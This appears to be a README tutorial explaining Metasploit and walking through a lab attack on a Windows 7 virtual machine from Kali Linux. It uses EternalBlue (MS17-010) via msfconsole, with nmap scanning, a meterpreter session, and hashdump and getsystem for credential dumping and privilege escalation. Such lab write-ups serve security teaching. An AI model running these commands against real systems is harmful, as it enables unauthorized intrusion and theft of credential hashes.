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In this repository, the use of Metasploit has been explained along with the practical implementation of hacking windows 7 through a kali Linux system.

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Metasploit is an exploitation framework (aka penetration framework) , build for security professional to support penetration testing.

Most related alternative

Cobalt strike – closed source/ commercial use only

Why prefer Metasploit?

It supports and provides sufficient tools for almost all the phases of the penetration testing.


graph TB
A(Metasploit support)
B(Commercial version only)
style A fill:lightgreen,color:black,stroke:#333,stroke-width:1px
style B fill:orange,color:black,stroke:#333,stroke-width:1px


Phases of penetration testing

graph LR
A(Reconnance) --> B(Scanning)
B --> C(Gaining Access)
C --> D(Maintaining Access)
D --> E(Clearing Tracks)
E --> F(Reporting)

style A fill:lightgreen,color:black,stroke-width:1px
style B fill:lightgreen,color:black,stroke-width:1px
style C fill:lightgreen,color:black,stroke-width:1px
style D fill:lightgreen,color:black,stroke-width:1px
style E fill:lightgreen,color:black,stroke-width:1px
style F fill:orange,color:black,stroke-width:1px

Modules provided by Metasploit?

  • exploits – the code that if executed takes advantage of the vulnerability to get unauthorized access to the desired system. Usually by the payload.

  • payload – used by exploits. payload is a piece of code that are run by the target after successful exploitation (for backdoor, add new user, privilege escalation)

  • Auxiliary – pre-exploitation features (scanning, fuzzing, sniffing)

  • Encoders – to bypass firewall, IDS, IPS, Antivirus

  • NOPS – no operation, use to ensure that if using multiple payloads, it is of same size. It ensures the proper execution of the instructions.

How to Get Started?

Metasploit Framework is Accessible Through:

NOTE: In case you are using any pen-testing OS like Kali Linux or Parrot Security, Metasploit framework comes pre-installed with Msfconsole in them.

Hacking Windows 7 Machine?

Attacker's Machine: Kali Linux 2022.2

Target Machine: Windows 7


  • The environment is setup in oracle vmware, with NAT connection
  • The firewall of the windows is already disabled in this demonstration
  • The Attacker and Target machine is connected over the same network. i.e., they are in the same subnet.

NOTE: All steps written below will be performed in the atacker's machine

Step 1: Open msfconsole

sudo msfconsole

Step 2: Finding the Target's IP

Find your eth0 IP address, to identify subnet to scan, because as the target machine is connected with the same router, it must be in the same subnet as well.

msf> ifconfig

Let attaker's IP: Running a simple no-port host discovery nmap scan on the sub-network to find the target's machine.

msf> nmap -sn

scan 1  result

One of this host could be the target machine we are looking for, so let's perform the osscan to be sure.

msf> nmap -O

scan 2  result We found the IP address of the target machine. Target IP:

Step 3: Finding Vulnerability in Target Machine

Checking if the current version of OS the target machine is running on is having any publicly known vulnerability. This can be achieved by nmap script scan.

msf> nmap --script="vuln"

scan 3  result

We identified that the target's machine is vulnerable for remote code execution, by the exploit smb-vuln-ms17-010. more details could be gathered from CVE-2017-0143.

Step 4: Finding and Setting up the Exploit

search is there is any exploit module available to exploit the Windows's SMB vulnerability ms17-101.

msf> search ms17 platform:windows

exploit 1 result

As we can see in the description of module index 0, it is mentioned that it provides an exploit named EternalBlue for MS17-010 vulnerability. We are going to use EternalBlue exploit, although you can also go for other modules.

msf> use 0
msf> show options

NOTE: You can use "show payload" to explore and change payload attached with the exploit.

exploit 2 result

As you can see, the place of RHOST is not set and mandatory to fill.

msf> set RHOST

exploit 3 result

NOTE: If your LHOST and LPORT is not set by default you can run following command to set LHOST to attacker's IP and LPORT to any random free port.

msf> set LHOST
msf> set LPORT 4444

Step 5: Exploiting to Gain Access

After setting up the environment just type exploit or run to execute the payload.

msf> exploit

Wait for few seconds and you will see an active meterpreter session. To verify your access, you can run following commands.

meterpreter> sysinfo
meterpreter> pwd

success 1 result

Step 6: Post Exploitation Steps commands like hashdump and getsystem could be used to perform privilege escalation.

meterpreter> hashdump
meterpreter> getsystem

success 2 result

However, it looks like the exploit we used also gave us the admin privilege in the provided meterpreter session.


In this repository, the use of Metasploit has been explained along with the practical implementation of hacking windows 7 through a kali Linux system.







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